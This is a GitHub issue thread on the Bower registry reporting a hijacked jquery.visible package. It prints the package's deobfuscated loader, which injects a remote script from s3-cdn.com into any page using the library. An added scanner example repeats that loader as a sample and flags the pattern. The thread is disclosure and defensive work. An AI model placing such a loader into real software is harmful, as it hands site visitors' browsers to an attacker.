bower / registry

The Bower registry
https://registry.bower.io/packages
MIT License

Malicious Package: Replaced Previous Valid Package #242

Closed grok closed 7 years ago

grok commented 7 years ago

Helloooo

Not sure how this happened. But, we dusted off a project, and did bower install.

The bower.json file looked like this:

{
  "name": "some-project-name",
  "private": true,
  "dependencies": {
    "velocity": "latest",
    "slick.js": "~1.3.11",
    "jScrollPane": "~2.0.14",
    "jquery-smartresize": "*",
    "pickadate": "~3.5.4",
    "moment": "~2.8.3",
    "heapbox": "~0.9.4",
    "jstorage": "~0.4.12",
    "jquery.visible": "~1.1.0",
    "responsive-tabs": "~1.4.0",
    "vimeo-player-js": "^1.0.6",
    "picturefill": "^3.0.2"
  }
}

It kept failing. Kept saying this:

bower jquery.visible#~1.1.0 ENORESTARGET No tag found that was able to satisfy ~1.1.0

So, we changed it to latest. That installed fine. Unfortunately... it installed a very obviously hacked library.

Here's a copy of the code: https://gist.github.com/grok/ee3e9337d0f5ca41797eb3841ef4da29

This, once you pull it apart, looks like this:

// Defines a one-off global (the 32-hex-digit tail makes the name unlikely to collide),
// then injects a <script> tag into <head> that pulls get-raw.js from s3-cdn.com.
if (typeof window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613 === 'undefined') {
    window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613 = function() {
        var a = document.getElementsByTagName('head')[0];
        var b = document.createElement('script');
        b.type = 'text/javascript';
        b.src = '//s3-cdn.com/github/get-raw.js';   // protocol-relative: follows the page's http/https
        a.appendChild(b);
    };
    getJs_f2c1ce8f7abf1928c1e5e9780adf9613();
}

You can follow the rabbit hole from there.

Regardless. Here are things we know:

  1. This used to work.
  2. It no longer works.
  3. If you search for "jquery.visible" on bower.io you will find it.
  4. The URL points to https://github.com/teamdf/jquery-visible which no longer exists.
  5. But regardless of that URL no longer existing, it's serving malicious code.

Recommended action: kill it with fire.
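The loader above is the thing worth detecting in any installed front-end dependency: a dynamically created script tag whose src points off-site, hung off a global with a hashed name. Below is an added example (not code from this thread, from Bower, or from the jquery.visible project) of a small scanner that flags that pattern in a directory of installed sources. The s3-cdn.com URL and the loader text are the ones posted above; the allowlisted host, the benign plugin body and the file paths are constructed for the demo.

```javascript
'use strict';
// Added example: flag dynamic <script> loaders pointing at remote hosts, plus
// one-off globals carrying a 32-hex-digit tail, in installed dependency sources.

const ALLOWED_HOSTS = new Set(['code.jquery.com']); // assumption: hosts you knowingly load from

const CREATE_SCRIPT = /createElement\(\s*['"]script['"]\s*\)/;
const SRC_ASSIGN = /\.src\s*=\s*(['"])((?:https?:)?\/\/[^'"]+)\1/g;
const HASHED_IDENT = /\b[A-Za-z_$][\w$]*_[0-9a-f]{32}\b/g;

function hostOf(url) {
  // Protocol-relative "//host/path" takes the page's scheme; give it one so URL() can parse it.
  return new URL(url.startsWith('//') ? 'https:' + url : url).hostname;
}

function findRemoteLoaders(source, allowed = ALLOWED_HOSTS) {
  const findings = [];
  if (!CREATE_SCRIPT.test(source)) return findings; // no dynamic <script> creation at all
  const hashedIdents = [...new Set(source.match(HASHED_IDENT) || [])];
  for (const m of source.matchAll(SRC_ASSIGN)) {
    const url = m[2];
    const host = hostOf(url);
    if (!allowed.has(host)) findings.push({ url, host, hashedIdents });
  }
  return findings;
}

function scanInstalled(files) {
  // files: { relativePath: sourceText }, e.g. read from bower_components/
  const report = {};
  for (const [path, src] of Object.entries(files)) {
    const hits = findRemoteLoaders(src);
    if (hits.length) report[path] = hits;
  }
  return report;
}

// Constructed samples. MALICIOUS is the loader posted in this issue; BENIGN is a
// made-up plugin body with no script injection.
const MALICIOUS = `
if (typeof window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613 === 'undefined') {
    window.getJs_f2c1ce8f7abf1928c1e5e9780adf9613 = function() {
        var a = document.getElementsByTagName('head')[0];
        var b = document.createElement('script');
        b.type = 'text/javascript';
        b.src = '//s3-cdn.com/github/get-raw.js';
        a.appendChild(b)
    };
    getJs_f2c1ce8f7abf1928c1e5e9780adf9613()
}`;

const BENIGN = `
(function ($) {
  $.fn.visible = function (partial) {
    var $t = $(this), viewTop = $(window).scrollTop();
    return $t.offset().top + (partial ? 0 : $t.height()) >= viewTop;
  };
})(jQuery);`;

// Constructed file layout standing in for a real bower_components/ tree.
console.log(JSON.stringify(scanInstalled({
  'bower_components/jquery.visible/jquery.visible.min.js': MALICIOUS,
  'bower_components/jquery.visible/jquery.visible.js': BENIGN,
}), null, 2));
```

Run it over the real tree by replacing the constructed object with the result of reading each `.js` under bower_components/. The allowlist matters: a CDN you deliberately use is fine, an unknown host assigned to `.src` at install time is what you want to see.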

benmann commented 7 years ago

cc: @sheerun

grok commented 7 years ago

Also for what it's worth: https://webcache.googleusercontent.com/search?q=cache:c4r4ofSJIcMJ:https://github.com/teamdf/jquery-visible/wiki+&cd=5&hl=en&ct=clnk&gl=us

grok commented 7 years ago

My current theory here is, their GitHub was compromised. Then deleted, and Bower cached the last hash and here we are.

sheerun commented 7 years ago

@grok This has nothing to do with Bower caching, github serves 404 on https://github.com/teamdf/jquery-visible but git clone https://github.com/teamdf/jquery-visible works and downloads malicious code. I suggest you raise this issue to their support.

As for the Bower, the best I can do is to remove this package from registry

sheerun commented 7 years ago

I agree that maybe their GitHub was compromised. But also it's possible they just changed their username and GitHub allowed someone else to register under the same name and create this repository. It's a vulnerability if you ask me.

grok commented 7 years ago

Thanks @sheerun -- as long as you guys are aware, see what happened and feel comfortable, I'll close this out.

It should still probably be pulled off of bower.

I'll follow up with GitHub then.

sheerun commented 7 years ago

I don't feel comfortable but I cannot tell what else we could do to prevent it.

Thank you for noticing us, please let us know what GitHub responds.

grok commented 7 years ago

Talking with another engineer about it @aradnom -- it would be interesting to consider bower warning someone if they are pulling down a "dead" package... though I have no idea what steps could be taken to ensure that it is in fact dead.

sheerun commented 7 years ago

I have no idea as well

sheerun commented 7 years ago

btw. If you used Yarn, it locks versions and does sha checksums as well, so it would be a non-issue

grok commented 7 years ago

Good idea! I'll talk to my team about that.

sheerun commented 7 years ago

@grok I'd also consider notifying domain name registrar where the malicious code is hosted: http://s3-cdn.com/github/get-raw.js

whois says the registrar is https://www.evoplus.com

grok commented 7 years ago

That's a domain protection company. Called, got a VM, gave up. I went a step further and found the original author of that repository on Twitter and sent them to this issue: https://twitter.com/SterLo/status/821799243857981440

sheerun commented 7 years ago

@grok I've unregistered this package and put a placeholder

sheerun commented 7 years ago

I'd like to find all such packages but it's too much cloning ;(

grok commented 7 years ago

I hear you! I know it's not a Bower problem, this is more of a Publisher and GitHub problem. It was just a wake-up call to my team and such that we need to be more vigilant in what is installed by package managers and then what gets compiled into the applications.